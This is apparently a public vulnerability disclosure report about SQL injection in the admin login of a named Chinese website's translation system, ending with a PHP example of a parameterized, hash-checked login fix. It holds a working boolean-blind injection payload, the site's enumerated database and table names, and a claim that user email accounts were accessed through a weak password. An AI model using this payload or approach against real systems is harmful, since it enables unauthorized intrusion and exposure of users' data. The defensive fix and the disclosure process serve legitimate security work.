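2013-12-17: Details reported to the vendor; awaiting vendor handling
2013-12-17: Vendor confirmed; details disclosed to the vendor only
2013-12-27: Details disclosed to core white hats and experts in related fields
2014-01-06: Details disclosed to regular white hats
2014-01-16: Details disclosed to trainee white hats
2014-01-31: Details disclosed to the public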
As the title says.
Affected site: http://www.chnpec.com
POST injection in the admin login of the translation system;
---
Place: POST
Parameter: tran_username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: tran_username=a' RLIKE IF(5767=5767,0x61,0x28) AND 'mUje'='mUje&tran_password=a
---
web application technology: PHP 5.4.9, Apache 2.2.22
back-end DBMS: MySQL 5
Database information:
available databases [6]:
[*] cpec
[*] ctvit
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Table information:
Database: cpec
[50 tables]
+------------------------------------+
| crproggetrightfr                   |
| crproginfo                         |
| crprogsalerightfr                  |
| crprogsalerigjt                    |
| hotwell_view                       |
| incre_table                        |
| perm_function_group                |
| perm_operation                     |
| perm_role                          |
| perm_role_function                 |
| perm_role_operation                |
| perm_user_role                     |
| program_view                       |
| tab_basiccolumn                    |
| tab_basicinformation               |
| tab_basicinformation_en            |
| tab_basicinformation_international |
| tab_city                           |
| tab_copyright                      |
| tab_crprogtip_relation             |
| tab_info_img                       |
| tab_info_video                     |
| tab_international_syntime          |
| tab_material                       |
| tab_program_apple                  |
| tab_program_hot                    |
| tab_sales_situation                |
| tab_tran_task                      |
| tab_tran_user                      |
| tab_tv_notice                      |
| tab_tv_videoinfo                   |
| tab_user                           |
| tab_video                          |
| tab_video_apple                    |
| tab_video_cut                      |
| tab_videoimg                       |
| tab_web_user                       |
| tab_words                          |
| temp_yrj                           |
| tiabstract                         |
| tiprogeng                          |
| tiproginfo                         |
| tvvideoinfo                        |
| welive_comment                     |
| welive_guest                       |
| welive_msg                         |
| welive_session                     |
| welive_user                        |
| welive_usergroup                   |
| welive_vvc                         |
+------------------------------------+
Partial user information:
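Using the weak mailbox password of one of the accounts, the e-mail account information of all users was obtained; continued brute-forcing might yield more, but testing stopped here;
See the detailed description
Filtering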
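A hardened form of the login lookup, as an added example that is not the site's code and not part of the original report: the `tran_username` value is bound as a parameter, so the payload shown above is compared as a literal string, and the password is checked against a salted hash instead of a stored plaintext value. Assumptions: `tab_tran_user` is the login table and has the columns used here, an in-memory SQLite database stands in for MySQL so the script runs offline, and the server runs PHP 5.5 or later for `password_hash()`.

```php
<?php
// Assumed schema: tab_tran_user(username, pw_hash). SQLite in memory stands in
// for the site's MySQL; with pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to
// false so that the server performs the parameter binding.
function demo_db()
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE tab_tran_user (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
    $ins = $pdo->prepare('INSERT INTO tab_tran_user (username, pw_hash) VALUES (?, ?)');
    // Constructed account; only a salted hash of the password is stored.
    $ins->execute(array('translator1', password_hash('constructed-Passw0rd!', PASSWORD_DEFAULT)));
    return $pdo;
}

// Binding alone: the value is sent as data and never becomes part of the SQL text.
function stored_hash(PDO $pdo, $username)
{
    $stmt = $pdo->prepare('SELECT pw_hash FROM tab_tran_user WHERE username = :u');
    $stmt->execute(array(':u' => $username));
    return $stmt->fetchColumn(); // false when no row matches
}

function login(PDO $pdo, $username, $password)
{
    // Allow-list validation as a second layer; arrays and odd characters are rejected.
    if (!is_string($username) || !is_string($password)
        || !preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $username)) {
        return false;
    }
    $hash = stored_hash($pdo, $username);
    return $hash !== false && password_verify($password, $hash);
}

$pdo = demo_db();
// tran_username value taken from the sqlmap output in the report.
$payload = "a' RLIKE IF(5767=5767,0x61,0x28) AND 'mUje'='mUje";

var_dump(stored_hash($pdo, $payload));                         // payload as a bound value
var_dump(login($pdo, $payload, 'a'));                          // payload through the full check
var_dump(login($pdo, 'translator1', 'constructed-Passw0rd!')); // constructed valid login
var_dump(login($pdo, 'translator1', '111111'));                // wrong password
```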
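Severity: High
Vulnerability Rank: 15
Confirmed: 2013-12-17 16:17
Thank you very much, we will rectify this service as soon as possible!~~ Thank you for your support and help!~~~
None yet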